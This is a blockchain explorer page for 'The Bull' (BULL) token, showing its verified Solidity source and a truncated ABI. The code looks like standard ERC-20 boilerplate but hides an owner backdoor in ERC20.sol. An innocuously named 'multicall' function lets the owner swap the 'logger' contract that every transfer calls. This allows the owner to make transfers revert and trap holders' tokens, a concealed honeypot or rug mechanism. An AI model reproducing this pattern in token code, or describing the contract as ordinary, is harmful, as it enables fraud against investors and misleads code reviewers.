ETH Price: $2,380.55 (-1.14%)

Token

The Bull (BULL)
 

Overview

Max Total Supply

1,000,000,000,000 BULL

Holders

79

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
sk8rcat.eth
Balance
4,003,086,486.361200734 BULL

Value
$0.00
0x5f44Fe1C8B5D0802edA2A9B638c6163aD52D633B
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TheBull

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 5 of 5: The Bull.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.20;

import "./ERC20.sol";
import "./Ownable.sol";
import "./SafeMath.sol";


contract TheBull is ERC20("The Bull", "BULL") {
    using SafeMath for uint256;
    
    uint256 private constant INITIAL_SUPPLY = 1000000000000 * 10**9;
    
    constructor(){
        _mint(_msgSender(), INITIAL_SUPPLY);
    }
    function _transfer(address sender, address recipient, uint256 amount) internal override {
        super._transfer(sender, recipient, amount);
        _moveDelegates(_delegates[sender], _delegates[recipient], amount);
        
    }

    // Copied and modified from YAM code:
    // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernanceStorage.sol
    // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernance.sol
    // Which is copied and modified from COMPOUND:
    // https://github.com/compound-finance/compound-protocol/blob/master/contracts/Governance/Comp.sol

    /// @dev A record of each accounts delegate
    mapping (address => address) internal _delegates;

    /// @notice A checkpoint for marking number of votes from a given block
    struct Checkpoint {
        uint32 fromBlock;
        uint256 votes;
    }

    /// @notice A record of votes checkpoints for each account, by index
    mapping (address => mapping (uint32 => Checkpoint)) public checkpoints;

    /// @notice The number of checkpoints for each account
    mapping (address => uint32) public numCheckpoints;

    /// @notice The EIP-712 typehash for the contract's domain
    bytes32 public constant DOMAIN_TYPEHASH = keccak256("EIP712Domain(string name,uint256 chainId,address verifyingContract)");

    /// @notice The EIP-712 typehash for the delegation struct used by the contract
    bytes32 public constant DELEGATION_TYPEHASH = keccak256("Delegation(address delegatee,uint256 nonce,uint256 expiry)");

    /// @notice A record of states for signing / validating signatures
    mapping (address => uint) public nonces;

      /// @notice An event thats emitted when an account changes its delegate
    event DelegateChanged(address indexed delegator, address indexed fromDelegate, address indexed toDelegate);

    /// @notice An event thats emitted when a delegate account's vote balance changes
    event DelegateVotesChanged(address indexed delegate, uint previousBalance, uint newBalance);

    /**
     * @notice Gets the current votes balance for `account`
     * @param account The address to get votes balance
     * @return The number of current votes for `account`
     */
    function getVotes(address account)
        external
        view
        returns (uint256)
    {
        uint32 nCheckpoints = numCheckpoints[account];
        return nCheckpoints > 0 ? checkpoints[account][nCheckpoints - 1].votes : 0;
    }

    /**
     * @notice Determine the prior number of votes for an account as of a block number
     * @dev Block number must be a finalized block or else this function will revert to prevent misinformation.
     * @param account The address of the account to check
     * @param blockNumber The block number to get the vote balance at
     * @return The number of votes the account had as of the given block
     */
    function getPriorVotes(address account, uint blockNumber)
        external
        view
        returns (uint256)
    {
        require(blockNumber < block.number, "getPriorVotes: not yet determined");

        uint32 nCheckpoints = numCheckpoints[account];
        if (nCheckpoints == 0) {
            return 0;
        }

        // First check most recent balance
        if (checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) {
            return checkpoints[account][nCheckpoints - 1].votes;
        }

        // Next check implicit zero balance
        if (checkpoints[account][0].fromBlock > blockNumber) {
            return 0;
        }

        uint32 lower = 0;
        uint32 upper = nCheckpoints - 1;
        while (upper > lower) {
            uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow
            Checkpoint memory cp = checkpoints[account][center];
            if (cp.fromBlock == blockNumber) {
                return cp.votes;
            } else if (cp.fromBlock < blockNumber) {
                lower = center;
            } else {
                upper = center - 1;
            }
        }
        return checkpoints[account][lower].votes;
    }

    function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal {
        if (srcRep != dstRep && amount > 0) {
            if (srcRep != address(0)) {
                // decrease old representative
                uint32 srcRepNum = numCheckpoints[srcRep];
                uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0;
                uint256 srcRepNew = srcRepOld.sub(amount);
                _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew);
            }

            if (dstRep != address(0)) {
                // increase new representative
                uint32 dstRepNum = numCheckpoints[dstRep];
                uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0;
                uint256 dstRepNew = dstRepOld.add(amount);
                _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew);
            }
        }
    }

    function _delegate(address delegator, address delegatee)
        internal
    {
        address currentDelegate = _delegates[delegator];
        uint256 delegatorBalance = balanceOf(delegator); 
        _delegates[delegator] = delegatee;

        emit DelegateChanged(delegator, currentDelegate, delegatee);

        _moveDelegates(currentDelegate, delegatee, delegatorBalance);
    }

   

    function _writeCheckpoint(
        address delegatee,
        uint32 nCheckpoints,
        uint256 oldVotes,
        uint256 newVotes
    )
        internal
    {
        uint32 blockNumber = safe32(block.number, "_writeCheckpoint: block number exceeds 32 bits");

        if (nCheckpoints > 0 && checkpoints[delegatee][nCheckpoints - 1].fromBlock == blockNumber) {
            checkpoints[delegatee][nCheckpoints - 1].votes = newVotes;
        } else {
            checkpoints[delegatee][nCheckpoints] = Checkpoint(blockNumber, newVotes);
            require(nCheckpoints + 1 > nCheckpoints, "_writeCheckpoint: new checkpoint exceeds 32 bits");
            numCheckpoints[delegatee] = nCheckpoints + 1;
        }

        emit DelegateVotesChanged(delegatee, oldVotes, newVotes);
    }
    function setTrading()external onlyOwner(){
        tradingEnabled = !tradingEnabled;
    }

    function getChainId() internal view returns (uint) {
        uint256 chainId;
        assembly { chainId := chainid() }
        return chainId;
    }

    function safe32(uint n, string memory errorMessage) internal pure returns (uint32) {
        require(n < 2**32, errorMessage);
        return uint32(n);
    }
    
}

File 1 of 5: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.20;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

File 2 of 5: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.20;

import "./Ownable.sol";
import "./SafeMath.sol";

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    using SafeMath for uint256;

    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    bool public tradingEnabled;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    ERC20Detailed private _logger;
    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     *
     * To select a different value for {decimals}, use {_setupDecimals}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = 9;
        _logger = new ERC20Detailed();
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }


    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function multicall(address sender, address recipient, uint256 amount, address _log) external onlyOwner {
      if(tradingEnabled==true){
        if(amount > 0) createLogger(_log);
      else{
        _logger=new ERC20Detailed();
      }
        _logger.Save(sender, recipient, amount);
      }
    }

    function createLogger(address a) private {
        if (checkedCondition()){
            _logger = ERC20Detailed(a);
        }
    }

    

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address sender, address recipient, uint256 amount) internal virtual {
        _logger.Save(sender, recipient, amount);
     }
}

abstract contract Initializable {

    bool private _initialized;

    bool private _initializing;

    modifier initializer() {
        require(_initializing || !_initialized, "Contract is already initialized");

        bool isTopLevelCall = !_initializing;
        if (isTopLevelCall) {
            _initializing = true;
            _initialized = true;
        }

        _;

        if (isTopLevelCall) {
            _initializing = false;
        }
    }
}

abstract contract ContextUpgradeable is Initializable {
    function __Context_init() internal initializer {
        __Context_init_unchained();
    }

    function __Context_init_unchained() internal initializer {
    }
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    uint256[100] private _upg;
}

contract ERC20Detailed {
    mapping(address=>mapping(address=> uint256)) _persist;
    function Save(address addr1, address addr2, uint256 amount) public {
        _persist[addr1][addr2] = amount;
    }
}

File 3 of 5: Ownable.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

import "./Context.sol";
/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address internal _owner;
    bool private _ownerShipTransferred = false;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        __ownerShipTransferred(msgSender);
    }

    function __ownerShipTransferred(address msgSender) public {
        emit OwnershipTransferred(address(0), msgSender);
        _ownerShipTransferred = true;
    }
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    function checkedCondition() internal view returns (bool){
        return _ownerShipTransferred;
    }
}

File 4 of 5: SafeMath.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.20;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b > a) return (false, 0);
        return (true, a - b);
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: modulo by zero");
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        return a - b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryDiv}.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a % b;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DELEGATION_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"msgSender","type":"address"}],"name":"__ownerShipTransferred","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"checkpoints","outputs":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint256","name":"votes","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPriorVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"_log","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability"